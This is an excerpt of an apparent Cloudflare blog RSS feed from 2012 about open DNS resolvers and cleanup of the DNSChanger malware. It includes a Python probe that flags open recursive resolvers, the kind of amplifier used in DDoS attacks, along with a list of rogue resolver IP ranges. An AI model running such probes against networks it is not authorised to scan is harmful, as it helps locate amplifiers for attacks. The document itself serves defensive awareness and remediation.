Corporation</p></td><td><p>1044</p></td><td><p>722</p></td><td><p>-31%</p></td></tr><tr><td><p>45595 </p></td><td><p>PKTELECOM-AS-PK Pakistan Telecom Company Limited</p></td><td><p>1030</p></td><td><p>716</p></td><td><p>-30%</p></td></tr><tr><td><p>4134 </p></td><td><p>CHINANET-BACKBONE No.31,Jin-rong Street</p></td><td><p>970</p></td><td><p>705</p></td><td><p>-27%</p></td></tr><tr><td><p>33182 </p></td><td><p>DIMENOC - HostDime.com, Inc.</p></td><td><p>940</p></td><td><p>638</p></td><td><p>-32%</p></td></tr><tr><td><p>7018 </p></td><td><p>ATT-INTERNET4 - AT&amp;T Services, 
Inc.</p></td><td><p>934</p></td><td><p>624</p></td><td><p>-33%</p></td></tr><tr><td><p>24940 </p></td><td><p>HETZNER-AS Hetzner Online AG RZ</p></td><td><p>872</p></td><td><p>593</p></td><td><p>-32%</p></td></tr><tr><td><p>26496 </p></td><td><p>AS-26496-GO-DADDY-COM-LLC - GoDaddy.com, LLC</p></td><td><p>855</p></td><td><p>560</p></td><td><p>-35%</p></td></tr><tr><td><p>20773 </p></td><td><p>HOSTEUROPE-AS Host Europe GmbH</p></td><td><p>835</p></td><td><p>517</p></td><td><p>-38%</p></td></tr><tr><td><p>16276</p></td><td><p>OVH OVH Systems</p></td><td><p>803</p></td><td><p>511</p></td><td><p>-36%</p></td></tr><tr><td><p>13768 </p></td><td><p>PEER1 - Peer 1 Network Inc.</p></td><td><p>707</p></td><td><p>421</p></td><td><p>-40%</p></td></tr><tr><td><p>14383 </p></td><td><p>VCS-AS - Virtacore Systems Inc</p></td><td><p>596</p></td><td><p>420</p></td><td><p>-30%</p></td></tr><tr><td><p>32613 </p></td><td><p>IWEB-AS - iWeb Technologies Inc.</p></td><td><p>585</p></td><td><p>367</p></td><td><p>-37%</p></td></tr><tr><td><p>23352 </p></td><td><p>SERVERCENTRAL - Server Central Network</p></td><td><p>577</p></td><td><p>350</p></td><td><p>-39%</p></td></tr><tr><td><p>2514 </p></td><td><p>INFOSPHERE NTT PC Communications, Inc.</p></td><td><p>561</p></td><td><p>341</p></td><td><p>-39%</p></td></tr><tr><td><p>2519 </p></td><td><p>VECTANT VECTANT Ltd.</p></td><td><p>531</p></td><td><p>326</p></td><td><p>-39%</p></td></tr><tr><td><p>15003 </p></td><td><p>NOBIS-TECH - Nobis Technology Group, LLC</p></td><td><p>521</p></td><td><p>322</p></td><td><p>-38%</p></td></tr><tr><td><p>22773 </p></td><td><p>ASN-CXA-ALL-CCI-22773-RDC - Cox Communications Inc</p></td><td><p>484</p></td><td><p>315</p></td><td><p>-35%</p></td></tr><tr><td><p>6830 </p></td><td><p>LGI-UPC UPC Broadband Holding B.V.</p></td><td><p>453</p></td><td><p>307</p></td><td><p>-32%</p></td></tr><tr><td><p>12322 </p></td><td><p>PROXAD Free 
SAS</p></td><td><p>449</p></td><td><p>299</p></td><td><p>-33%</p></td></tr><tr><td><p>21788 </p></td><td><p>NOC - Network Operations Center Inc.</p></td><td><p>442</p></td><td><p>295</p></td><td><p>-33%</p></td></tr><tr><td><p>17506 </p></td><td><p>UCOM UCOM Corp.</p></td><td><p>422</p></td><td><p>293</p></td><td><p>-31%</p></td></tr><tr><td><p>6939 </p></td><td><p>HURRICANE - Hurricane Electric, Inc.</p></td><td><p>414</p></td><td><p>284</p></td><td><p>-31%</p></td></tr><tr><td><p>16265</p></td><td><p>LEASEWEB LeaseWeb B.V.</p></td><td><p>407</p></td><td><p>284</p></td><td><p>-30%</p></td></tr><tr><td><p>3269 </p></td><td><p>ASN-IBSNAZ Telecom Italia S.p.a.</p></td><td><p>402</p></td><td><p>281</p></td><td><p>-30%</p></td></tr><tr><td><p>29550</p></td><td><p>SIMPLYTRANSIT Simply Transit Ltd</p></td><td><p>392</p></td><td><p>271</p></td><td><p>-31%</p></td></tr><tr><td><p>19262 </p></td><td><p>VZGNI-TRANSIT - Verizon Online LLC</p></td><td><p>390</p></td><td><p>262</p></td><td><p>-33%</p></td></tr></table>
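<p>For readers curious how a scan like this identifies open resolvers: you send each candidate IP a recursive query for a name it isn't authoritative for, and flag it if it answers with the Recursion Available bit set. The Python below is an illustrative sketch of that probe (not the scanner we actually run); the wire-format details follow RFC 1035.</p>

```python
import socket
import struct

def build_query(name, txid=0x1234):
    """Build a minimal DNS query: A record, recursion desired (RFC 1035)."""
    # Header: id, flags (RD=1), QDCOUNT=1, zero answer/authority/additional
    header = struct.pack(">HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    # QNAME: length-prefixed labels terminated by a zero byte
    qname = b"".join(bytes([len(label)]) + label.encode("ascii")
                     for label in name.split(".")) + b"\x00"
    question = qname + struct.pack(">HH", 1, 1)  # QTYPE=A, QCLASS=IN
    return header + question

def is_open_resolver(ip, name="example.com", timeout=2.0):
    """True if `ip` recursively answers a DNS query from an arbitrary client."""
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_query(name), (ip, 53))
        data, _ = sock.recvfrom(512)
    except OSError:            # timeout or ICMP unreachable: not open
        return False
    finally:
        sock.close()
    flags = struct.unpack(">H", data[2:4])[0]
    recursion_available = bool(flags & 0x0080)
    rcode = flags & 0x000F     # 0 = NOERROR; 5 = REFUSED means it's locked down
    return recursion_available and rcode == 0
```

<p>A properly locked-down resolver will either ignore the packet or answer REFUSED; one that answers the question with recursion available is exactly the kind of amplifier attackers look for.</p>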
    <div>
      <h3>Kudos</h3>
      <a href="#kudos">
        
      </a>
    </div>
    <p>A few other organizations deserve a special shout out for helping with this effort. The great folks at <a href="http://teamcymru.com/">Team Cymru</a> have been tracking open resolvers and other badness online since before CloudFlare was even an idea. Their consistent efforts in this area have been awesome, and we're in the process of partnering with them to help get the word out.</p><p>In addition, SoftLayer has been especially vocal and active in spearheading clean up efforts on its network. As they <a href="http://blog.softlayer.com/2012/the-trouble-with-open-dns-resolvers/">pointed out in a great blog post</a>, because of the size and nature of their network, it's often difficult for them to police the configuration of software their customers run. Even so, they are actively reaching out to customers to educate them about the dangers of running open resolvers on their networks.</p><p>We greatly appreciate country CERTs/CSIRTs and various Information Sharing and Analysis Centers (ISACs) reaching out to us offering to get in touch with some of the less responsive network providers.</p><p>Going forward, we are happy to provide the IP addresses running open resolvers directly to any network provider that is interested in cleaning up their networks. If you're running a network on the list above, please don't hesitate to reach out to us, and we'll get you the data you need to help with cleanup.</p> ]]></content:encoded>
            <category><![CDATA[Reliability]]></category>
            <category><![CDATA[OpenDNS]]></category>
            <category><![CDATA[DNS]]></category>
            <category><![CDATA[DDoS]]></category>
            <guid isPermaLink="false">4YIvDtgRg2gC2AQBbvAvPH</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[DNSChanger Update: Nearly 4% of Infections Already Detected]]></title>
            <link>https://blog.cloudflare.com/dnschanger-update-nearly-4-of-infections-alre/</link>
            <pubDate>Sun, 20 May 2012 22:33:00 GMT</pubDate>
            <description><![CDATA[ Just a quick update on the initiative between CloudFlare, OpenDNS, and the DCWG to clean up the DNSChanger malware. In the last week, just over 11,000 websites enabled the Visitor DNSChanger Detector App through CloudFlare. ]]></description>
<content:encoded><![CDATA[ <p>Just a quick update on the initiative between CloudFlare, OpenDNS, and the DCWG to <a href="/cloudflare-opendns-work-together-to-save-the">clean up the DNSChanger malware</a>. In the last week, just over 11,000 websites enabled the <a href="https://www.cloudflare.com/apps/dnschanger_detector">Visitor DNSChanger Detector App</a> through CloudFlare. Since then, those sites have collectively served more than 56 million page views. Just over 12,000 visitors to those websites have seen the warning about the DNSChanger virus and clicked on the link to learn more and clean up their infection. In just the first week, the CloudFlare community has already helped notify and clean up nearly <b>4% of the estimated total number of infected computers</b>.</p><p>While hundreds of thousands of computers are still infected and risk losing access to the Internet on July 9, 2012, we're proud of the strong start to this effort by the CloudFlare community along with OpenDNS and the DCWG.</p><p>If you haven't yet enabled the Visitor DNSChanger Detector App for your sites on CloudFlare, you can do so by following <a href="https://www.cloudflare.com/enable-app?app=dnschanger_detector">this link</a>.</p><p>Thanks for helping us #savetheweb.</p> ]]></content:encoded>
            <category><![CDATA[Save The Web]]></category>
            <category><![CDATA[OpenDNS]]></category>
            <category><![CDATA[Reliability]]></category>
            <guid isPermaLink="false">7B4cCwu01V0Hx97hvbDHjS</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
        <item>
            <title><![CDATA[CloudFlare & OpenDNS Work Together to Help the Web]]></title>
            <link>https://blog.cloudflare.com/cloudflare-opendns-work-together-to-save-the/</link>
            <pubDate>Thu, 03 May 2012 13:00:00 GMT</pubDate>
            <description><![CDATA[ Several years ago, some suspected cyber criminals on the Internet wrote a family of malware dubbed DNSChanger. About a year ago, law enforcement tracked down the suspected cyber criminals behind this malware. ]]></description>
<content:encoded><![CDATA[ <p>Several years ago, some suspected cyber criminals on the Internet wrote a family of malware dubbed DNSChanger. About a year ago, law enforcement tracked down the suspected cyber criminals behind this malware, arrested them, and took over the servers they were using to redirect customers to rogue sites.</p><p>As a result of a court order, the Internet Systems Consortium (ISC), under the direction of the FBI, has continued to run the DNS servers used by the malware for the last year. However, the court order will soon expire and those servers are scheduled to be shut down on July 9, 2012. When that happens, hundreds of thousands of Internet users whose systems are still infected and/or affected could lose access to the web, email, and anything else that depends on DNS. This is the story of how two Internet infrastructure startups — CloudFlare and <a href="http://www.opendns.com">OpenDNS</a> — are playing a small part to help solve the problem.</p>
    <div>
      <h3>A Bit of DNS Background</h3>
      <a href="#a-bit-of-dns-background">
        
      </a>
    </div>
    <p>Up front, in order to understand this story, you need to understand there are two types of DNS servers: recursive and authoritative. Everyone who uses the Internet needs a recursive DNS server. Your ISP usually provides these services, or you can use a provider like OpenDNS, <a href="https://www.cloudflare.com/cloudflare-vs-google-dns/">Google</a>, DNSAdvantage, other public resolvers, or even run a server yourself to handle your recursive DNS queries.</p><p>On the other hand, every domain needs at least one authoritative DNS server. Authoritative servers are where a particular domain's records are hosted and published. Many <a href="https://www.cloudflare.com/learning/dns/glossary/what-is-a-domain-name-registrar/">domain registrars</a> provide authoritative DNS servers, or you can use a service like CloudFlare, which provides authoritative DNS. When an Internet user types a Uniform Resource Identifier (URI), better known as a Uniform Resource Locator (URL), into their browser, clicks on a link, or sends an email, their computer queries their recursive DNS provider. If the recursive DNS provider has the answer cached then it responds. If it doesn't have the answer cached, or if the answer it has is stale, then the recursive DNS server queries the authoritative DNS server.</p><p>As mentioned above, OpenDNS provides recursive DNS. Their customers are web surfers, and they provide a terrific service that helps speed up Internet browsing and protect people on the web from malware. CloudFlare provides authoritative DNS. Our customers are websites, and we make those sites faster and protect them from attacks directed at them. While we're often asked if OpenDNS and CloudFlare are competitive, in reality both services are complementary, simply using different parts of DNS (recursive and authoritative) to achieve a similar mission: a faster, safer, better Internet.</p>
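<p>The caching behavior described above is simple enough to sketch. The Python below is a toy model (not real resolver code) of the "answer from cache unless stale, otherwise ask the authoritative server" logic, with the upstream lookup injected as a function so it runs without a network:</p>

```python
import time

class RecursiveCache:
    """Toy model of a recursive resolver's cache-then-ask-upstream logic."""

    def __init__(self, query_authoritative):
        # query_authoritative(name) -> (ip, ttl_seconds); stands in for the
        # real query to the domain's authoritative DNS server
        self.query_authoritative = query_authoritative
        self.cache = {}  # name -> (ip, expires_at)

    def resolve(self, name, now=None):
        now = time.time() if now is None else now
        hit = self.cache.get(name)
        if hit is not None and hit[1] > now:
            return hit[0]                         # cached and fresh: answer directly
        ip, ttl = self.query_authoritative(name)  # missing or stale: go upstream
        self.cache[name] = (ip, now + ttl)
        return ip
```

<p>Two lookups inside the record's TTL cost only one trip to the authoritative server; after the TTL expires, the resolver goes upstream again.</p>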
    <div>
      <h3>How Suspected Cyber Criminals Use DNS to Do Bad Things</h3>
      <a href="#how-suspected-cyber-criminals-use-dns-to-do-bad-things">
        
      </a>
    </div>
    <p>The DNSChanger malware family was designed to change the recursive DNS server that Internet users' computers query. Instead of directing DNS queries at the recursive server you or your ISP configured, the malware modified computer settings to route queries to recursive DNS servers controlled by the suspected cyber criminals.</p><p>The job of DNS is to translate a <a href="https://www.cloudflare.com/learning/dns/glossary/what-is-a-domain-name/">domain name</a> such as dcwg.org, which humans prefer, into an IP address, like 108.162.205.64, which servers and routers can use. If you are a cyber criminal and you can gain control over someone's recursive DNS, then you can direct traffic for certain sites to fake versions of those sites. Once DNSChanger had web surfers querying rogue recursive DNS servers, all requests for legitimate websites could be directed to a fake website. For example, even if you typed your bank's domain name into your browser, if the suspected cyber criminals control recursive DNS then they can send you to a malicious site and steal your information.</p><p>Over the years DNSChanger operated unchecked, more than a million computers and home routers had their DNS configurations modified. Thankfully, law enforcement was able to track down the suspected cyber criminals behind the malware, arrest them, and seize control of the rogue recursive DNS servers. Unfortunately, hundreds of thousands of computers are still using the formerly rogue recursive DNS servers. On July 9, 2012 the court order directing ISC to operate the servers expires and those servers are scheduled to be shut down. On that date, all systems which still have their DNS settings modified by DNSChanger will effectively be cut off from the Internet.</p>
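<p>Checking whether a machine is affected is conceptually straightforward: compare its configured resolver against the address ranges the rogue servers lived in. The sketch below uses the ranges from the public FBI/DCWG advisories (quoted here from memory of those advisories, so verify them against dcwg.org before relying on them):</p>

```python
import ipaddress

# Rogue DNSChanger resolver ranges per the public FBI/DCWG advisories.
# Quoted for illustration only -- double-check against dcwg.org.
ROGUE_RANGES = [ipaddress.ip_network(cidr) for cidr in (
    "85.255.112.0/20",
    "67.210.0.0/20",
    "93.188.160.0/21",
    "77.67.83.0/24",
    "213.109.64.0/20",
    "64.28.176.0/20",
)]

def uses_rogue_resolver(resolver_ip):
    """True if the configured DNS resolver falls inside a rogue range."""
    addr = ipaddress.ip_address(resolver_ip)
    return any(addr in net for net in ROGUE_RANGES)
```

<p>The browser-based detector works differently (it can't read your DNS settings from Javascript), but this is the kind of check the dcwg.org test pages perform server-side after seeing which resolver your query arrived from.</p>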
    <div>
      <h3>Getting the Word Out</h3>
      <a href="#getting-the-word-out">
        
      </a>
    </div>
    <p>The DNSChanger Working Group (DCWG), a loosely affiliated organization comprised of some of the world's largest and most competent ISPs, search engine vendors, software vendors, security companies, and others, has been working to get the word out about the problem and reduce the impact of the shutdown of the DNSChanger recursive servers. The DCWG launched a website (dcwg.org) to provide information about the malware, let people test whether they are infected, and provide recommendations on how to fix their systems. CloudFlare first became involved when the folks at dcwg.org reached out to us because their site was under heavy load after attention from major media outlets. CloudFlare helped keep the dcwg.org website online under the load caused by media attention over the last 10 days. We offloaded more than 95% of the traffic to the site, ensuring the site ran fast and stable even when it was being featured on the front page of cnn.com.</p><p>Unfortunately, one of the challenges in trying to address situations like DNSChanger is that you only know to go to the dcwg.org website if you already know about it. What was needed was something akin to an emergency broadcast system that would inform people who were infected that they had a problem as they surfed the web. In the process of working with the DCWG, we realized we might be able to help.</p><p>Some of our engineers created an app named Visitor DNSChanger Detector App. Any website on CloudFlare can enable the app with a single click from our apps marketplace. The app installs a small bit of Javascript on the page that tests visitors to see if they're infected. If the tests do not detect anything, nothing happens. If the tests indicate that the DNSChanger recursive servers are being used, then a banner is displayed across the top of the page and visitors are directed to instructions on how to clean up the infection (more on that in a second).</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4rcW1y2z1SfbuAUHKVmr6e/11fcf74f101535ea62d47715125f04b6/banner_example.png.scaled500.png" />
            
            </figure><p>More than 470 million people pass through CloudFlare's network on a monthly basis. Our data suggest that more than half of the people infected with DNSChanger would visit at least one site on CloudFlare per month. The power of the Visitor DNSChanger Detector App is that as more CloudFlare publishers enable it, the likelihood increases that people who are infected will get information about their infection before they are no longer able to use the Internet on July 9, 2012.</p><p>While we've made it extremely easy for publishers on CloudFlare's network to help get the word out, we didn't want to restrict participation to only those sites using our service. We therefore decided to release the code for the checks publicly and as open source so anyone who can install a few lines of Javascript on their web pages will be able to install it on their own sites to inform their potentially infected users. You can access the code from the following <a href="https://github.com/cloudflare/dnschanger_detector">GitHub Repo</a>. We're hopeful that sites both large and small will take the time to install the code in order to help inform their visitors who may be infected.</p>
    <div>
      <h3>What Should People Notified of This Infection Do?</h3>
      <a href="#what-should-people-notified-of-this-infection-do">
        
      </a>
    </div>
    <p>While CloudFlare is able to assist with informing web surfers they have an infection, we aren't particularly well situated to actually fix the problem. After all, it isn't our customers that are directly impacted, but rather the customers of our customers. Many of the folks infected can get help from their ISPs, but for some this might not be an option. CloudFlare reached out to David Ulevitch, the CEO of OpenDNS, and he saw this as a great opportunity to further OpenDNS's mission of helping build a better Internet. We added <a href="http://www.opendns.com/dns-changer">OpenDNS as a resource</a> for publishers to display to their customers when the Javascript detects the use of the DNSChanger recursive servers.</p>
    <div>
      <h3>The Power of the DNS</h3>
      <a href="#the-power-of-the-dns">
        
      </a>
    </div>
    <p>This incident illustrates to me the importance and power of the DNS system that underpins the Internet. The suspected cyber criminals were able to modify DNS settings to steal advertising revenue and perform other illegal activities. CloudFlare uses authoritative DNS to provide powerful tools that make sites faster, and even to help create a sort of emergency warning system for the Internet. OpenDNS provides high performance recursive DNS caching services for their customers. Combined, we hope to help the DCWG get the word out so the hundreds of thousands of Internet users still impacted by the DNSChanger malware will be able to take steps to ensure they'll be able to use the Internet on July 10, 2012 and beyond.</p> ]]></content:encoded>
            <category><![CDATA[Save The Web]]></category>
            <category><![CDATA[Malware]]></category>
            <category><![CDATA[OpenDNS]]></category>
            <category><![CDATA[Policy & Legal]]></category>
            <guid isPermaLink="false">2N8sl2EjBxblXGvV9OtA45</guid>
            <dc:creator>Matthew Prince</dc:creator>
        </item>
    </channel>
</rss>